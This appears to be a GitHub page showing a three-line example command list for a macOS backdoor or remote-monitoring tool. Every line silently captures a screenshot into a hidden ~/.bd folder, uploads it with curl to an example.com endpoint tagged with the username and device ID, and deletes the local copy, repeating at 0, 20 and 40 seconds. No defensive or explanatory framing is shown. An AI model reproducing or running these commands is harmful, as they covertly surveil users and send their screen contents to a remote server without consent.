-
Notifications
You must be signed in to change notification settings - Fork 7
Expand file tree
/
Copy pathcommand_list_example
More file actions
3 lines (3 loc) · 839 Bytes
/
command_list_example
File metadata and controls
3 lines (3 loc) · 839 Bytes
1
2
3
1#Enable#all#Repeat#d="`date '+%s%N' | cut -b1-13`"; /usr/sbin/screencapture -x "/Users/`whoami`/.bd/$d"; curl -o /dev/null -s -F "a=@/Users/`whoami`/.bd/$d" http://example.com/upload.php?user=`whoami`\\&filetype=screenshot\\&deviceid=`cat ~/.bd/deviceid`; rm -f ~/.bd/15*
2#Enable#all#Repeat#sleep 20; d="`date '+%s%N' | cut -b1-13`"; /usr/sbin/screencapture -x "/Users/`whoami`/.bd/$d"; curl -o /dev/null -s -F "a=@/Users/`whoami`/.bd/$d" http://example.com/upload.php?user=`whoami`\\&filetype=screenshot\\&deviceid=`cat ~/.bd/deviceid`; rm -f ~/.bd/15*
3#Enable#all#Repeat#sleep 40; d="`date '+%s%N' | cut -b1-13`"; /usr/sbin/screencapture -x "/Users/`whoami`/.bd/$d"; curl -o /dev/null -s -F "a=@/Users/`whoami`/.bd/$d" http://example.com/upload.php?user=`whoami`\\&filetype=screenshot\\&deviceid=`cat ~/.bd/deviceid`; rm -f ~/.bd/15*